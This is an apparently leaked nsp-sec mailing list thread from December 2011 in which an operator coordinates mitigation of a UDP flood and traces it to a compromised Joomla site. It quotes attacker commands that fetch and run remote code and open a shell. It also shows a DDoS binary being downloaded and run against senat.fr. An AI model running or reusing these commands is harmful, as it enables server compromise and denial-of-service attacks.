[nsp-sec] UDP/80 flows to 89.185.38.26

David Freedman david.freedman at uk.clara.net
Sun Dec 25 08:54:10 EST 2011


More information:

"
78.171.174.84 - - [25/Dec/2011:06:27:28 +0000] "GET
/administrator/index.php?option=com_templates&client=0&task=edit_source&id=
beez HTTP/1.1" 200 
          10206 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; tr;
rv:1.9.2.10) Gecko/20100914 Firefox/3.6.10 ( .NET CLR 3.5.30729; .NET4.0E)"

78.171.174.84 - - [25/Dec/2011:06:29:12 +0000] "POST
//administrator/index.php HTTP/1.1" 200 17631 "-" "-"

that seems to have uploaded /templates/beez/index.php which is a php
remote shell
then they ran: $shell = 'cd /dev/shm; wget www.artemisjoy.nl/w/iad.txt;
perl iad.txt; /bin/sh -i';
iad.txt is a perl script which just rund bbd against senat.fr
"


artemisjoy.nl also has IPv6 connectivity through fiberring.nl

Prefix:              2a00:ec8::/32
Prefix description:  Fiberring
Country code:        NL
Origin AS:           38930
Origin AS Name:      FIBERRING FiberRing B.V.
RPKI status:         No ROA found




On 25/12/2011 13:49, "David Freedman" <david.freedman at eu.clara.net> wrote:

>I may have struck some gold here, the customer in question is part of the
>french national government ,
>somebody on a private IRC channel I frequent found a machine of his
>compromised and attacking
>an fr .gov site (but not the same one)
>
>
>[11:47] <grifferz> system("wget artemisjoy.nl/w/ddb");^M
>[11:47] <grifferz> system("chmod 777 ddb");^M
>[11:47] <grifferz> system("./ddb www.senat.fr 80 127.0.0.1");^M
>
>
>Prefix:              91.217.56.0/23
>Prefix description:  Tiscom Hosting route object
>Country code:        NL
>Origin AS:           8455
>Origin AS Name:      ATOM86-AS ATOM86 Autonomous System
>RPKI status:         No ROA found
>
>$ wget artemisjoy.nl/w/ddb
>--2011-12-25 13:46:27--  http://artemisjoy.nl/w/ddb
>Resolving artemisjoy.nl... 91.217.56.94, 2a00:ec8:401:1:a044::1
>Connecting to artemisjoy.nl|91.217.56.94|:80... connected.
>HTTP request sent, awaiting response... 200 OK
>Length: 14303 (14K) [text/plain]
>Saving to: `ddb'
>
>100%[======================================>] 14,303      --.-K/s   in 0.1s
>
>2011-12-25 13:46:27 (121 KB/s) - `ddb' saved [14303/14303]
>
>
>
>
>$ file ddb
>ddb: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically
>linked (uses shared libs), for GNU/Linux 2.2.5, not stripped
>
>$ strings ddb
>
><interesting bits>
>
>DDOS Coder by fastforce
>UNKNOWN SECURITY TEAM
>fastforce uHu Pink-Cashmere
>C* Made in TURKEY C*
>NE MUTLU TURKUM DIYENE !!!
>COMPILED AND HOSTED BY ALBANIA SECURITY CLAN
>www.albanianhaxorz.org /server -m irc.Gigachat.net 6667 -j #ASC
>>>> http://www.zone-h.org/en/defacements/filter/filter_defacer=ASC/ <<<
>
>Packeting %s, port %d spoofed as %s
>Unknown host : %s
>Usage : %s <hedef ip> <hedef port> <spoof ip>
>
>$ md5 ddb
>
>MD5 (ddb) = a3100823936173c6670ad0e011eaa413
>
>
>
>The guy is inspecting his netflow now to see if he can identify the source
>of the compromise.
>
>
>
>On 25/12/2011 13:36, "David Freedman" <david.freedman at eu.clara.net> wrote:
>
>>This attack is still ongoing, though thankfully we are mitigating it.
>>We are seeing quite a bit of traffic from OVH (AS16276/AS12322); are any
>>of these folk on list?
>>
>>Dave.
>>
>>
>>On 25/12/2011 00:10, "David Freedman" <david.freedman at uk.clara.net>
>>wrote:
>>
>>>----------- nsp-security Confidential --------
>>>
>>>If anybody is seeing UDP/80 flows toward 89.185.38.26, can they please
>>>squash, we've had an attack ongoing for the past three hours.
>>>
>>>Thanks!
>>>
>>>David Freedman
>>>Claranet
>>>
>>>
>>>
>>>_______________________________________________
>>>nsp-security mailing list
>>>nsp-security at puck.nether.net
>>>https://puck.nether.net/mailman/listinfo/nsp-security
>>>
>>>Please do not Forward, CC, or BCC this E-mail outside of the
>>>nsp-security
>>>community. Confidentiality is essential for effective Internet security
>>>counter-measures.
>>>_______________________________________________
>>
>